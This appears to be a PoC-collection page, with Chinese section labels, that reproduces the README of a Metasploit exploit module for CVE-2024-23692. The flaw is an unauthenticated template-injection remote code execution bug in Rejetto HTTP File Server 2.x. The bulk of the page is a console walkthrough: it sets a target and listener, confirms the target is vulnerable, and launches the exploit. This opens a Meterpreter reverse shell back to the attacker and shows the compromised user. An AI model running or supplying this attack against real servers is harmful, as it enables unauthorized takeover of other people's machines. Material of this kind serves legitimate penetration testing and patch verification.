来源

关联漏洞

描述

Rejetto HTTP File Server (HFS) 2.x - Unauthenticated RCE exploit module (CVE-2024-23692)

介绍

An unauth SSTI in the Rejetto HTTP File Server (HFS).

Original finder PoC: https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/

Tested against versions:
2.4.0 RC7, 2.3m


**Example usage:**

```
msf6 > use exploit/windows/http/rejetto_hfs_rce_cve_2024_23692
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set RHOSTS 192.168.1.5
RHOSTS => 192.168.1.5
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set RPORT 80
RPORT => 80
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > check
[+] 192.168.1.5:80- The target is vulnerable. Rejetto HFS version 2.4.0 RC7
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LHOST eth0
LHOST => eth0
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > exploit

[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Rejetto HFS version 2.4.0 RC7
[*] Sending stage (201798 bytes) to 192.168.1.5
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.5:43508) at 2024-07-10 09:30:44 +0103

meterpreter > getuid
Server username: test_server\john
meterpreter >
```

文件快照

 [4.0K]  /data/pocs/87ba189cb13ca548836e4699c413310f828ce168
└── [1.3K]  README.md

0 directories, 1 file

备注